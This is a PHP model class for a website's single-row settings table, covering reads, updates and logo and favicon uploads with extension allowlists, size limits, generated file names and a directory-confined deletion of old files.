Viewing: Setting.php
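<?php

/**
 * Model for the site-wide configuration stored in the `settings` table.
 *
 * The table is treated as a single-row store: every read and write in this
 * class targets the row with id = 1. The class also handles the logo and
 * favicon uploads that belong to that row.
 *
 * Upload handling notes:
 *  - The extension is taken from the client-supplied file name and matched
 *    against an allowlist; the stored file name is generated server-side, so
 *    no part of the client name other than that allow-listed extension
 *    reaches the filesystem.
 *  - NOTE(review): file contents are not inspected here. If the upload
 *    directory is served by the web server, confirm that script execution is
 *    disabled for it and consider verifying the detected MIME type as well.
 */
class Setting extends BaseModel
{
    /** Maximum accepted upload size in bytes (2 MiB). */
    private const SETTINGS_MAX_UPLOAD_BYTES = 2 * 1024 * 1024;

    /** Extensions accepted for the logo image. */
    private const SETTINGS_LOGO_EXTENSIONS = ['jpg', 'jpeg', 'png', 'webp'];

    /** Extensions accepted for the favicon. */
    private const SETTINGS_FAVICON_EXTENSIONS = ['png', 'ico', 'webp'];

    /** Upload directory, relative to ROOT_PATH, without leading or trailing slash. */
    private const SETTINGS_UPLOAD_DIR = 'storage/uploads/settings';

    protected string $table = 'settings';

    protected array $fillable = [
        'system_name',
        'site_name',
        'logo',
        'favicon',
        'email',
        'phone',
        'whatsapp',
        'address',
        'instagram',
        'facebook',
        'tiktok',
        'youtube',
        'linkedin',
        'seo_title',
        'seo_description',
        'seo_keywords',
        'site_status',
        'updated_at',
    ];

    /**
     * Return the settings row, creating it with defaults on first use.
     *
     * @return array The row with id = 1 as returned by the statement's fetch().
     *
     * @throws \RuntimeException When the row is still missing after the default
     *                           row was created (previously this case recursed
     *                           without bound).
     */
    public function getSettings(): array
    {
        $settings = $this->fetchSettingsRow();
        if ($settings) {
            return $settings;
        }

        $this->create([
            'id' => 1,
            'system_name' => 'Panel Administrativo',
            'site_name' => 'Constructora F Bonill@',
            'site_status' => 'activo',
        ]);

        // Re-read exactly once: if create() did not persist the row, fail
        // loudly instead of calling ourselves again and exhausting the stack.
        $settings = $this->fetchSettingsRow();
        if ($settings) {
            return $settings;
        }

        throw new \RuntimeException('Unable to load or create the settings row.');
    }

    /**
     * Update the settings row (id = 1), stamping `updated_at` with the current time.
     *
     * @param array $data Column => value pairs to write.
     *
     * @return bool Result of the inherited update() call.
     */
    public function updateSettings(array $data): bool
    {
        $data['updated_at'] = date('Y-m-d H:i:s');

        return $this->update(1, $data);
    }

    /**
     * Store an uploaded logo and remove the previous one.
     *
     * @param array       $file    One entry of $_FILES.
     * @param string|null $oldFile Relative path of the file being replaced, if any.
     *
     * @return string|null Relative path of the stored file, or null when nothing was stored.
     */
    public function uploadLogo(array $file, ?string $oldFile = null): ?string
    {
        return $this->uploadFile($file, self::SETTINGS_LOGO_EXTENSIONS, 'logo', $oldFile);
    }

    /**
     * Store an uploaded favicon and remove the previous one.
     *
     * @param array       $file    One entry of $_FILES.
     * @param string|null $oldFile Relative path of the file being replaced, if any.
     *
     * @return string|null Relative path of the stored file, or null when nothing was stored.
     */
    public function uploadFavicon(array $file, ?string $oldFile = null): ?string
    {
        return $this->uploadFile($file, self::SETTINGS_FAVICON_EXTENSIONS, 'favicon', $oldFile);
    }

    /**
     * Check an upload entry against the error, size and extension rules.
     *
     * An entry with an empty name means "no file submitted" and is reported as
     * valid so that the field stays optional.
     *
     * @param array  $file One entry of $_FILES.
     * @param string $type 'logo' selects the logo allowlist; any other value
     *                     selects the favicon allowlist.
     */
    public function isValidUpload(array $file, string $type): bool
    {
        if (empty($file['name'])) {
            return true;
        }

        if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
            || ($file['size'] ?? 0) > self::SETTINGS_MAX_UPLOAD_BYTES
        ) {
            return false;
        }

        $allowedExts = $type === 'logo'
            ? self::SETTINGS_LOGO_EXTENSIONS
            : self::SETTINGS_FAVICON_EXTENSIONS;
        $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));

        // Redundant with the allowlist below, kept as a guard in case an
        // executable or script-bearing type is ever added to an allowlist.
        if (in_array($extension, ['php', 'js', 'html', 'svg', 'phtml', 'phar'], true)) {
            return false;
        }

        return in_array($extension, $allowedExts, true);
    }

    /**
     * Read the row with id = 1 from the settings table.
     *
     * @return mixed Whatever the statement's fetch() returns (falsy when no row exists).
     */
    private function fetchSettingsRow()
    {
        $statement = $this->db->query('SELECT * FROM settings WHERE id = 1 LIMIT 1');

        return $statement->fetch();
    }

    /**
     * Validate an upload and move it into the settings upload directory.
     *
     * The size cap is enforced here as well as in isValidUpload(), so a caller
     * that skips the validation step cannot store an oversized file.
     *
     * @param array       $file        One entry of $_FILES.
     * @param array       $allowedExts Lower-case extensions accepted for this upload.
     * @param string      $prefix      Prefix of the generated file name.
     * @param string|null $oldFile     Relative path of the file being replaced, if any.
     *
     * @return string|null Relative path of the stored file, or null on any failure.
     */
    private function uploadFile(array $file, array $allowedExts, string $prefix, ?string $oldFile): ?string
    {
        if (empty($file['name']) || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
            return null;
        }

        if (empty($file['tmp_name']) || ($file['size'] ?? 0) > self::SETTINGS_MAX_UPLOAD_BYTES) {
            return null;
        }

        $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
        if ($extension === 'jpeg') {
            $extension = 'jpg';
        }

        if (!in_array($extension, $allowedExts, true)) {
            return null;
        }

        // The stored name is built from a timestamp and random bytes; only the
        // allow-listed extension is taken from the client-supplied name.
        $filename = $prefix . '_' . date('YmdHis') . '_' . bin2hex(random_bytes(6)) . '.' . $extension;
        $directory = ROOT_PATH . '/' . self::SETTINGS_UPLOAD_DIR;
        $destination = $directory . '/' . $filename;

        // The second is_dir() covers a concurrent request creating the directory.
        if (!is_dir($directory) && !mkdir($directory, 0775, true) && !is_dir($directory)) {
            return null;
        }

        // move_uploaded_file() refuses paths that are not genuine HTTP uploads.
        if (!move_uploaded_file($file['tmp_name'], $destination)) {
            return null;
        }

        $this->deleteOldFile($oldFile);

        return self::SETTINGS_UPLOAD_DIR . '/' . $filename;
    }

    /**
     * Delete a previously stored upload, but only if it resolves to a regular
     * file inside the settings upload directory.
     *
     * @param string|null $oldFile Path relative to ROOT_PATH, as returned by uploadFile().
     */
    private function deleteOldFile(?string $oldFile): void
    {
        if (!$oldFile) {
            return;
        }

        $base = realpath(ROOT_PATH . '/' . self::SETTINGS_UPLOAD_DIR);
        $target = realpath(ROOT_PATH . '/' . ltrim($oldFile, '/'));

        if (!$base || !$target) {
            return;
        }

        // Compare against the directory *with* a trailing separator. A bare
        // prefix match would also accept sibling paths that merely begin with
        // the same characters (for example a directory named "settings_old").
        if (str_starts_with($target, $base . DIRECTORY_SEPARATOR) && is_file($target)) {
            unlink($target);
        }
    }
}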